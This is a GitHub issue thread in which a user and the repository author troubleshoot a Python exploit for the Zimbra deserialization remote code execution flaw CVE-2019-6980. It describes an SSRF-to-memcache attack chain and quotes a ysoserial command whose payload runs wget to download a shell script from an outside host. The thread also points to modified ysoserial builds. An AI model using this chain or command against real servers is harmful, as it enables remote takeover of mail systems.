Homework-of-Python icon indicating copy to clipboard operation
Homework-of-Python copied to clipboard

Published 20 hours ago verified publisher icon 3gstudent

Deserialization error in the Zimbra_Deserialization_RCE_CVE-2019-6980.py

Open chenxiaode168 opened this issue 2 years ago • 3 comments

Good morning,

I have tested CVE-2019-6980 on Zimbra version 8.7.10 & 8.7.11 (Free edition) with the latest ysoserial package version 0.0.6. For both cases, there are some errors observed from the mailbox.log shown below: com.zimbra.common.service.ServiceException: system failure: Failed to deserialize ImapFolder xxxxxxx xxxxxxxxxxxx Caused by: java.io,InvalidClassException: org.mozillla.javascript.ScriptableObject: local class incompatible: stream classdesc serVersionUID=xxxxxxxxxxxxxxx, local class serialVersionUID=-xxxxxxxxxxxxxxxxx xxxxxxxx xxxxxxxx

From my observation, the zImap entry was successfully inserted into the memcache (Verified) through SSRF, and deserialization occurred when the imap account was logged on (with select inbox, correct folderNo, modseq & uidvalidity).

MozillaRhino2 payload was used in ysoserial to generate the payload (java -jar ysoserial.jar MozillaRhino2 "/usr/bin/wget http://1.2.3.4/test.sh --no-check-certificate -O /tmp/test.sh"). I also tested with MozillaRhino1 but it failed too.

Can advise what did i do wrong here? What is the exact zimbra version and ysoserial that u have tested with? Thank you very much

chenxiaode168 avatar Sep 08 '22 10:09 chenxiaode168

Zimbra 8.8.10 ysoserial 0.0.6

It seems that it should be a problem of deserializing Payload. You can also try this ysoserial from https://blog.csdn.net/fnmsd/article/details/89235589?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control&dist_request_id=1328603.11954.16149289993579653&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-1.control

Download link of ysoserial: 链接:https://pan.baidu.com/s/1UZ7sxI1l0f3EB0MydDu2GQ 提取码:0sgb

3gstudent avatar Sep 15 '22 01:09 3gstudent

Hi, thank for your advice. I try test on Zimbra version 8.8.6 with the same error. From these results, it may not be the Zimbra version issue? I use the offical ysoserial 0.0.6 release. I think it is the same as your ysoserial version. what else can i try to make it work? thank you

chenxiaode168 avatar Sep 27 '22 05:09 chenxiaode168

Try this: https://github.com/3gstudent/test/releases/download/ysoserial-0.0.6-SNAPSHOT/ysoserial-0.0.6-SNAPSHOT.zip

3gstudent avatar Oct 08 '22 01:10 3gstudent